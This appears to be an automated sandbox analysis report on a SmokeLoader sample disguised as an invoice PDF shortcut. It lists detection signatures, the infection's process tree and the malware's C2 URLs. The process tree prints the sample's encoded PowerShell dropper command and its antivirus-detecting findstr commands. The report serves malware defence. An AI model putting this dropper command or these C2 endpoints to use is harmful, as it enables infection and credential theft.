Edit tour
Windows
Analysis Report
invoice_template.pdf.lnk
Overview
General Information
| Sample name: | invoice_template.pdf.lnk |
| Analysis ID: | 1550361 |
| MD5: | 9843c5bbba28871898a11724713926a7 |
| SHA1: | 28a28d00c8d8a6e284e679cbc94fc586b32650e8 |
| SHA256: | 1fe661a6f1371bfd4b4c2fdc0e835f8ca8bbdc2d25b00b5b89846fc4cdeea2f1 |
| Infos: |   |
 | |
Detection
SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Benign windows process drops PE files
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64native
powershell.exe (PID: 4428 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -e JABiADY ANAAgAD0AI ABAACgAUwB lAGwAZQBjA HQALQBTAHQ AcgBpAG4AZ wAgAC0AUAB hAHQAdABlA HIAbgAgACI AYQBEAHUAY wBrACIAIAA tAFAAYQB0A GgAIAAuAFw AaQBuAHYAb wBpAGMAZQB fAHQAZQBtA HAAbABhAHQ AZQAuAHAAZ ABmAC4AbAB uAGsAKQAuA EwAaQBuAGU AIAAtAHIAZ QBwAGwAYQB jAGUAIAAnA GEARAB1AGM AawAnADsAU wBlAHQALQB DAG8AbgB0A GUAbgB0ACA AJABlAG4Ad gA6AHQAZQB tAHAAXAB3A GkAbgBwAGQ AZgAuAGUAe ABlACAALQB FAG4AYwBvA GQAaQBuAGc AIABCAHkAd ABlACAALQB WAGEAbAB1A GUAIABAACg AWwBTAHkAc wB0AGUAbQA uAEMAbwBuA HYAZQByAHQ AXQA6ADoAR gByAG8AbQB CAGEAcwBlA DYANABTAHQ AcgBpAG4AZ wAoACQAYgA 2ADQAKQApA DsAIABpAG4 AdgBvAGsAZ QAtAGkAdAB lAG0AIAAkA GUAbgB2ADo AdABlAG0Ac ABcAHcAaQB uAHAAZABmA C4AZQB4AGU A MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 1432 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) 
winpdf.exe (PID: 4340 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\winpdf .exe" MD5: 80FDAC591563D6CE2CAC6B0D254B8AC7) - cmd.exe (PID: 7220 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Co ffee Coffe e.bat & Co ffee.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) 
tasklist.exe (PID: 828 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6828 cmdline:
findstr /I "wrsa ops svc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 7888 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7180 cmdline:
findstr -I "avastui avgui bdse rvicehost nswscsvc s ophoshealt h" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7692 cmdline:
cmd /c md 367647 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - findstr.exe (PID: 6828 cmdline:
findstr /V "HOWCONCE RNEDPAMMUR DER" Mice MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7164 cmdline:
cmd /c cop y /b ..\Is + ..\Ashl ey + ..\Al lan + ..\S pan Y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
Productive.pif (PID: 5352 cmdline: Productive .pif Y MD5: 18CE19B57F43CE0A5AF149C96AECC685) - Productive.pif (PID: 7424 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\367647\ Productive .pif MD5: 18CE19B57F43CE0A5AF149C96AECC685) 
explorer.exe (PID: 5064 cmdline: C:\Windows \Explorer. EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7) - explorer.exe (PID: 4176 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: ED8F152C2498988F130BA8D85B321E12) - explorer.exe (PID: 3140 cmdline:
C:\Windows \explorer. exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7) - explorer.exe (PID: 3684 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: ED8F152C2498988F130BA8D85B321E12) - explorer.exe (PID: 6792 cmdline:
C:\Windows \explorer. exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7) - explorer.exe (PID: 808 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: ED8F152C2498988F130BA8D85B321E12) - explorer.exe (PID: 4480 cmdline:
C:\Windows \explorer. exe MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7) - explorer.exe (PID: 6212 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: ED8F152C2498988F130BA8D85B321E12) - choice.exe (PID: 1588 cmdline:
choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- fejhsit (PID: 5924 cmdline:
C:\Users\u ser\AppDat a\Roaming\ fejhsit MD5: 18CE19B57F43CE0A5AF149C96AECC685)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| Click to see the 4 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||